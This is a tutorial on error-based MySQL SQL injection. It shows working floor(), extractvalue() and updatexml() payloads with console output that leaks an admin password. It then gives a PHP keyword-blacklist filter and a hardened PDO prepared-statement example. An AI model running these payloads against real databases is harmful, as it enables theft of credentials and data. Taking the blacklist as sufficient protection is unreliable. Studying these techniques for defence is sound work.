1. Through the floor() error
You can use the following statements:

```sql
and (select 1 from (select count(*), concat(version(), floor(rand(0)*2)) x from information_schema.tables group by x) a);
and (select count(*) from (select 1 union select null union select !1) x group by concat((select table_name from information_schema.tables limit 1), floor(rand(0)*2)));
```
The examples are as follows. Start with the normal query:

```sql
mysql> select * from article where id = 1;
+----+-------+---------+
| ID | Title | Content |
+----+-------+---------+
|  1 | Test  | Do It   |
+----+-------+---------+
```
If the given id exists, the following statement triggers the error:

```sql
mysql> select * from article where id = 1 and (select 1 from (select count(*), concat(version(), floor(rand(0)*2)) x from information_schema.tables group by x) a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
```
The MySQL version is returned inside the error message. To retrieve other data, replace version() in the statement with the desired subquery. For example, to query the administrator username and password:

```sql
-- Method 1
mysql> select * from article where id = 1 and (select 1 from (select count(*), concat((select pass from admin where id = 1), floor(rand(0)*2)) x from information_schema.tables group by x) a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

-- Method 2
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1) x group by concat((select pass from admin limit 1), floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
```
2. Through extractvalue()

The test statement is as follows:

```sql
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
```
Actual test process:

```sql
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c, (select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: 'admin888'
```
3. Through updatexml()

Test statement:

```sql
and 1=(updatexml(1, concat(0x5e24, (select user()), 0x5e24), 1))
```
Actual test process:

```sql
mysql> select * from article where id = 1 and 1=(updatexml(1, concat(0x5e24, (select pass from admin limit 1), 0x5e24), 1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
```
One characteristic shared by the methods above is that the injected query statement is very long, so limiting the input length can filter them quite effectively. For SQL injection in general, I would like to share an anti-SQL-injection function.
1. Constructing the function

```php
<?php
/*
 * Function name: inject_check()
 * Purpose: detect whether a submitted value contains characters used in SQL
 *          injection, to block the injection and protect the server
 * Parameter: $sql_str - the submitted variable
 * Return value: the detection result, true or false
 */
function inject_check($sql_str)
{
    // The original used eregi(), which was removed in PHP 7; preg_match() with
    // the /i modifier performs the same case-insensitive match. The regex
    // metacharacters in the keyword list (/* * ../ ./) are escaped so that
    // they match literally.
    return preg_match("#select|insert|update|delete|'|/\*|\*|\.\./|\./|union|into|load_file|outfile#i", $sql_str) === 1;
}
```
2. Using the function

```php
<?php
// inject_check() from the block above must be defined or included first.
if (inject_check($_GET['id'] ?? '')) {
    exit('The data you submitted is illegal, please check and resubmit!');
} else {
    $id = $_GET['id'];
    // ... work with the data ...
}
?>
```
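As an added example, written for this page and not taken from the original article: a keyword blacklist such as inject_check() also rejects legitimate input that merely contains a substring like "selection" or "update", and the three error-based techniques above only leak data when the raw MySQL error text is echoed back to the client. The hardened article-by-id lookup below instead validates id as an integer, binds it through a PDO prepared statement so the value is never parsed as SQL, and keeps database errors out of the HTTP response. The DSN, the database name, the 'app' user and its password are placeholder assumptions.

```php
<?php
// Added example (not from the original article): a hardened version of the
// "select * from article where id = ..." lookup that the tutorial injects into.
// Assumed: a MySQL database 'test' on localhost, reachable as user 'app'.

function connect_db(): PDO
{
    // Placeholder credentials; replace with the real DSN, user and password.
    return new PDO('mysql:host=localhost;dbname=test;charset=utf8mb4', 'app', 'CHANGE_ME', [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION, // errors become exceptions
        PDO::ATTR_EMULATE_PREPARES   => false,                  // real server-side prepares
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

function fetch_article(PDO $pdo, $raw_id): ?array
{
    // Reject anything that is not a plain positive integer before it reaches
    // the database; filter_var() returns false for arrays and non-numeric text.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // The statement text is fixed; the value is bound as an integer parameter,
    // so payloads like the floor()/extractvalue()/updatexml() ones above are
    // never interpreted as SQL.
    $stmt = $pdo->prepare('SELECT id, title, content FROM article WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

try {
    $pdo = connect_db();
    $article = fetch_article($pdo, $_GET['id'] ?? '');
    if ($article === null) {
        http_response_code(404);
        exit('Article not found.');
    }
    echo htmlspecialchars($article['title'], ENT_QUOTES, 'UTF-8');
} catch (PDOException $e) {
    // Log the real error server-side; never echo $e->getMessage() to the
    // client, since the error text is exactly what error-based injection reads.
    error_log('DB error: ' . $e->getMessage());
    http_response_code(500);
    exit('Internal error.');
}
```

The integer check is specific to this endpoint; for free-text parameters the prepared statement alone is what prevents injection, and suppressing error output is what removes the error-based leak channel regardless of the parameter type.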
For more on SQL anti-injection in PHP, see http://www.111cn.net/phper/phpanqn/37379.htm